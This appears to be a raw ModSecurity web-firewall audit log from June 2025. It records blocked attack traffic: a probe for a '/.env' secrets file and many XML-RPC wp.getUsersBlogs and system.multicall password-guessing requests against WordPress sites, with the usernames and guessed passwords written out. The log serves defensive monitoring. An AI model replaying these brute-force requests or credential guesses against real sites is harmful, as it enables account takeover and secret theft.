https Connection: close User-Agent: Go-http-client/1.1 --689c3123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --689c3123-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749120633297958 802 (- - -) Stopwatch2: 1749120633297958 802; combined=333, p1=295, p2=0, p3=0, p4=0, p5=38, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --689c3123-Z-- --160e4e50-A-- [05/Jun/2025:17:51:02 +0700] aEF2llwdJdhOudw5hdz8nAAAAIY 103.236.140.4 52920 103.236.140.4 8181 --160e4e50-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.20.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.20.105 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --160e4e50-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminDeveloper@54321 --160e4e50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --160e4e50-E-- --160e4e50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.20.105 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749120662073247 5760 (- - -) Stopwatch2: 1749120662073247 5760; combined=4083, p1=466, p2=3439, p3=0, p4=0, p5=107, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --160e4e50-Z-- --38648c53-A-- [05/Jun/2025:17:51:19 +0700] aEF2p3-K7ToMdu-YSIJTxQAAAAo 103.236.140.4 52970 103.236.140.4 8181 --38648c53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --38648c53-C-- wp.getUsersBlogs kesiswaan hunter --38648c53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38648c53-E-- --38648c53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120679626585 4269 (- - -) Stopwatch2: 1749120679626585 4269; combined=3291, p1=351, p2=2773, p3=0, p4=0, p5=97, sr=83, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38648c53-Z-- --b554cb27-A-- [05/Jun/2025:17:52:00 +0700] aEF20FwdJdhOudw5hdz8uAAAAIk 103.236.140.4 53056 103.236.140.4 8181 --b554cb27-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b554cb27-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin#Admin# --b554cb27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b554cb27-E-- --b554cb27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749120720164110 4817 (- - -) Stopwatch2: 1749120720164110 4817; combined=3674, p1=408, p2=3104, p3=0, p4=0, p5=95, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b554cb27-Z-- --487bac2d-A-- [05/Jun/2025:17:52:20 +0700] aEF25Oth7G2xELALzPZa_QAAAMM 103.236.140.4 53100 103.236.140.4 8181 --487bac2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --487bac2d-C-- wp.getUsersBlogs kesiswaan junior --487bac2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --487bac2d-E-- --487bac2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120740787533 4973 (- - -) Stopwatch2: 1749120740787533 4973; combined=3544, p1=420, p2=2955, p3=0, p4=0, p5=99, sr=90, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487bac2d-Z-- --ca617816-A-- [05/Jun/2025:17:53:20 +0700] aEF3IFwdJdhOudw5hdz81QAAAJI 103.236.140.4 53226 103.236.140.4 8181 --ca617816-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ca617816-C-- wp.getUsersBlogs kesiswaan qwer123456 --ca617816-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca617816-E-- --ca617816-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120800064864 4429 (- - -) Stopwatch2: 1749120800064864 4429; combined=3365, p1=398, p2=2801, p3=0, p4=0, p5=97, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca617816-Z-- --c3443b40-A-- [05/Jun/2025:17:54:29 +0700] aEF3ZSrHpfaS2Cuwh8UIpgAAAEA 103.236.140.4 53412 103.236.140.4 8181 --c3443b40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c3443b40-C-- wp.getUsersBlogs kesiswaan london --c3443b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3443b40-E-- --c3443b40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120869917497 5523 (- - -) Stopwatch2: 1749120869917497 5523; combined=3815, p1=478, p2=3164, p3=0, p4=0, p5=102, sr=92, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3443b40-Z-- --1e2c576d-A-- [05/Jun/2025:17:55:29 +0700] aEF3oVwdJdhOudw5hdz9EwAAAIM 103.236.140.4 53576 103.236.140.4 8181 --1e2c576d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --1e2c576d-C-- wp.getUsersBlogs kesiswaan Parola12 --1e2c576d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e2c576d-E-- --1e2c576d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120929482622 4482 (- - -) Stopwatch2: 1749120929482622 4482; combined=3410, p1=371, p2=2817, p3=0, p4=0, p5=132, sr=82, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e2c576d-Z-- --5c641a6f-A-- [05/Jun/2025:17:56:31 +0700] aEF33-th7G2xELALzPZbcgAAANI 103.236.140.4 53770 103.236.140.4 8181 --5c641a6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5c641a6f-C-- wp.getUsersBlogs timkreatif Admin123 --5c641a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c641a6f-E-- --5c641a6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120991937280 4451 (- - -) Stopwatch2: 1749120991937280 4451; combined=3321, p1=356, p2=2796, p3=0, p4=0, p5=99, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c641a6f-Z-- --8ed8483d-A-- [05/Jun/2025:17:57:32 +0700] aEF4HFwdJdhOudw5hdz9FwAAAJA 103.236.140.4 53880 103.236.140.4 8181 --8ed8483d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8ed8483d-C-- wp.getUsersBlogs timkreatif 1984 --8ed8483d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed8483d-E-- --8ed8483d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121052301095 4979 (- - -) Stopwatch2: 1749121052301095 4979; combined=3704, p1=423, p2=3042, p3=0, p4=0, p5=138, sr=85, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed8483d-Z-- --5901d348-A-- [05/Jun/2025:17:57:37 +0700] aEF4Ieth7G2xELALzPZbhQAAAMs 103.236.140.4 53912 103.236.140.4 8181 --5901d348-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5901d348-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsolehx --5901d348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5901d348-E-- --5901d348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749121057973932 4633 (- - -) Stopwatch2: 1749121057973932 4633; combined=3586, p1=398, p2=2982, p3=0, p4=0, p5=117, sr=79, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5901d348-Z-- --76dc3373-A-- [05/Jun/2025:17:58:32 +0700] aEF4WCrHpfaS2Cuwh8UI2QAAAEk 103.236.140.4 54078 103.236.140.4 8181 --76dc3373-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --76dc3373-C-- wp.getUsersBlogs timkreatif admin12345 --76dc3373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76dc3373-E-- --76dc3373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121112381352 4986 (- - -) Stopwatch2: 1749121112381352 4986; combined=3683, p1=382, p2=3102, p3=0, p4=0, p5=114, sr=81, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76dc3373-Z-- --21d2926c-A-- [05/Jun/2025:17:58:54 +0700] aEF4bn-K7ToMdu-YSIJUTwAAAAg 103.236.140.4 54142 103.236.140.4 8181 --21d2926c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --21d2926c-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminantix2019 --21d2926c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21d2926c-E-- --21d2926c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749121134347041 4419 (- - -) Stopwatch2: 1749121134347041 4419; combined=3428, p1=384, p2=2879, p3=0, p4=0, p5=96, sr=101, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21d2926c-Z-- --f87c1c3e-A-- [05/Jun/2025:17:59:32 +0700] aEF4lH-K7ToMdu-YSIJUfQAAAAc 103.236.140.4 54254 103.236.140.4 8181 --f87c1c3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f87c1c3e-C-- wp.getUsersBlogs timkreatif Admin@321 --f87c1c3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f87c1c3e-E-- --f87c1c3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121172584507 4474 (- - -) Stopwatch2: 1749121172584507 4474; combined=3381, p1=371, p2=2845, p3=0, p4=0, p5=96, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f87c1c3e-Z-- --c611c63d-A-- [05/Jun/2025:18:00:32 +0700] aEF40H-K7ToMdu-YSIJUxgAAAAo 103.236.140.4 54434 103.236.140.4 8181 --c611c63d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c611c63d-C-- wp.getUsersBlogs timkreatif Administrator123 --c611c63d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c611c63d-E-- --c611c63d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121232688540 4218 (- - -) Stopwatch2: 1749121232688540 4218; combined=3259, p1=343, p2=2727, p3=0, p4=0, p5=108, sr=80, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c611c63d-Z-- --ede4406d-A-- [05/Jun/2025:18:01:36 +0700] aEF5EOth7G2xELALzPZbuAAAANg 103.236.140.4 54634 103.236.140.4 8181 --ede4406d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ede4406d-C-- wp.getUsersBlogs timkreatif manager123 --ede4406d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ede4406d-E-- --ede4406d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121296006512 4173 (- - -) Stopwatch2: 1749121296006512 4173; combined=3215, p1=339, p2=2712, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ede4406d-Z-- --fc6fea71-A-- [05/Jun/2025:18:02:37 +0700] aEF5TX-K7ToMdu-YSIJVLgAAAAA 103.236.140.4 54738 103.236.140.4 8181 --fc6fea71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fc6fea71-C-- wp.getUsersBlogs timkreatif explorer --fc6fea71-F-- 